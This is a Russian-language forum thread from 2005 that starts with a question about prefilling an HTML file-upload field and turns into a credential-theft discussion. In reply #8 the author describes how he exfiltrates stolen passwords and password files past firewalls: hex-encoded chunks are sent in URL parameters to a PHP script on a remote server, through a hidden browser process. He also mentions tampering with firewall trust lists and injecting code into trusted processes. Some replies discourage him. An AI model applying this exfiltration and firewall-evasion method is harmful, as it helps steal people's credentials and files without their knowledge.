| Вопрос: Как заполнить в хтмл поле типа file | Добавлено: 21.06.05 03:26 |
Автор вопроса:  HACKER
|
|
Есть хтмл страница:
<html>
<head> <title>Untitled Document</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#FFFFFF"> <form action="upload.php" method="post" ENCTYPE="multipart/form-data"> File to upload:<input type="file" size=40 name="file"><br> <input type="hidden" name="MAX_FILE_SIZE" value="100000"> <input type="submit" value="upload"> </form> </body> </html> И нужно как то прямо при загрузки страницы вписать что-то в <input type="file" чё не пробовал не получается. Думаю тут надо использовать JS or VBS... Есть предложения? |
| Ответы | Всего ответов: 14 |
|
Номер ответа: 1 Автор ответа:  Sharp Лидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #1 | Добавлено: 21.06.05 11:22 |
| Ты не должен такого хотеть, поскольку согласно твоей логике, тогда любая веб-страница может стырить у тебя любой файл. | ||
|
Номер ответа: 2 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #2 | Добавлено: 21.06.05 21:07 |
так поэтому и хочу 
|
||
|
Номер ответа: 3 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #3 | Добавлено: 21.06.05 21:13 |
| Может есть предложение как то программно? Т.е. через VB? Тут советовали COM технологию поучить, мол IE можно через COM заставить сделать многое, но браузеров то много и далеко не все на IE сидят. | ||
|
Номер ответа: 4 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #4 | Добавлено: 21.06.05 21:33 |
| Невозможно, если бы было возможно, давно бы пропатчили. | ||
|
Номер ответа: 5 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #5 | Добавлено: 21.06.05 22:53 |
|
Ну "невозможно" - такого не бывает Скорее сложно... Например есть сырс проги по определению содержимого всех текстовых окошек в IE. Т.е. прочитать то возможно, почему записать невозможно?
|
||
|
Номер ответа: 6 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #6 | Добавлено: 22.06.05 16:11 |
| Зачем чесать ухо пяткой? Если впариваешь трой или тыришь файлы, делай это через свежие эксплоиты. Через DOM это сделать невозможно. | ||
|
Номер ответа: 7 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #7 | Добавлено: 22.06.05 18:31 |
| невозможно, FILE сам по себе заполнен быть не может, это я ещё когда-то в руководстве по ПХП прочитал. | ||
|
Номер ответа: 8 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #8 | Добавлено: 22.06.05 19:36 |
А может... или..не.. мля  Вообще всё сложно оказалось, почитав там статьи всякие, много чё вроде полезного, но все они на сегодняшний день не актуальны, разве что эксплоиты самые новые, и то там тоже всё довольно глухо. Я пробовал разными способами, и только один более мение прокатил, он же самый простой... Пробовал вот что:
Прописывать себя у фаервола в списки доверенных. Но далеко не у всех фаерволов лежат данные просто так на виду, и отредактировать их не получалось. А даже у тех котрых получалось, оказалось что фаерволы держат контрольные суммы размера программы, так что нечго не получилось, прописать себя не удалось. Внедрятся в другой (доверенный фаерволом) (как делал DaSharm в своём FireFucker...)процесс, на ходу когда он работает... это очень сложно, нескажу что у меня получилось, скажу то что новые фаерволы контролируют размер процесса, и когда внедряемся в другой то он блокирует всё приложение... С этой фишкой что файл со страницы отправить тоже нефига... Думал у фаерволов есть некоторые доверенные проги по умолчание (ftp.exe telnet,exe)... нет, у нормальных фаеров нет, все всё переспрашивают у пользователя... И нашёлся только 1 выход, оооочень медленный, неудобный, тормозящий комп... НО РАБОЧИЙ! И не один фаер не видит, я врядли когда-то выйдет такой который увидит... Вообще тема для обсуждения плохая, т.к. это не тот форум, я конечно всё понимаю... Просто в краце опишу суть, кто в танке - поймёт... Берём файл, кодируем его в HEX... В итоге получаем строку "FA FF 00 итд..." Это строка ровно в 2 раза больше оригинального файла. Далее пишем маленький пхп скрипт, которому данные передаются в переменной в строке адреса (URL) и он эти данные сохраняет на сервак... Т.е. "http://site.com/script.php?file=имя_файла&text=закодированные_в_HEX_данне" При чём скрипт при повторном запросе, файл не переписует а дописует в конец... Разбиваем text (закодированные данные) примерно по 1000 символов, формируем URL и открываем его браузером, типа Shell url$ & text$, vbHide... А скрипт по окончание отправки данных изменит <title> ... Вот мы откроем браузер и будет ждать пока не появится окно с определённым заголовком, как появилось - убили браузер, и передли слейдущий пакет данные (слейдущие 1000 символов)... В итоге много паролей+много файлов с паролями от разных программ, архивируем винраром, текст сжимается очень хорошо, у меня полученный файл не привышает 10 кб, переводя в hex получается 20 кб, это примерно 20 запросов, т.е. 20 раз открыть и убить браузер + паузы чтоб не сильно комп грузить, вообщем исходный файл в 10 кб, отправляет 2-4 минуты... смотря какой инет... Зато работает 100% Некоторые фаеры для браузеров которые открылись на 3128 порт даже лог не пишут! неговоря о том что перехватывать итп... Ну как? Можт ещё кто-то что-то посоветует, только что-то такое что действительно реально на текущий момент. |
||
|
Номер ответа: 9 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #9 | Добавлено: 23.06.05 17:15 |
| эээээ никто не врубился или все проигнорировали? | ||
|
Номер ответа: 10 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #10 | Добавлено: 23.06.05 21:48 |
| Не занимайся глупостями, пиши нормальные программы | ||
|
Номер ответа: 11 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #11 | Добавлено: 23.06.05 22:43 |
|
А я и нормальные пишу, и не нормальные...
|
||
|
Номер ответа: 12 Автор ответа:  popovius ICQ: 225692610 Вопросов: 9 Ответов: 15 |
Web-сайт: Профиль | | #12 | Добавлено: 20.12.05 14:00 |
|
молодец!
наш человек. Скажу одну интересную вещь. Миранда %-))) |
||
|
Номер ответа: 13 Автор ответа: АлександрРазработчик Offline Client ICQ: 204034 Вопросов: 106 Ответов: 1919 |
Профиль | | #13 | Добавлено: 20.12.05 17:10 |
| Хм.. popovius.. Ты когда мне заплатишь? Уже долго жду.. | ||
|
Номер ответа: 14 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #14 | Добавлено: 22.12.05 21:50 |
|
да ацтой это, в 3 ответе я про COM говорил, это прикольней чуть, я уже давно реализовывал, на форуме ещё тема была, непомню как называется, искать влом... и это ацтой внедрение в АП рулит )) а ещё хочу с 0-колечком попробовать влом в асме копаться да и времени ща мало... Гы, а вообще ты архиолог, теме всего-то пол года, чё бы не продолжить, да?
|
||
Страница: 1 |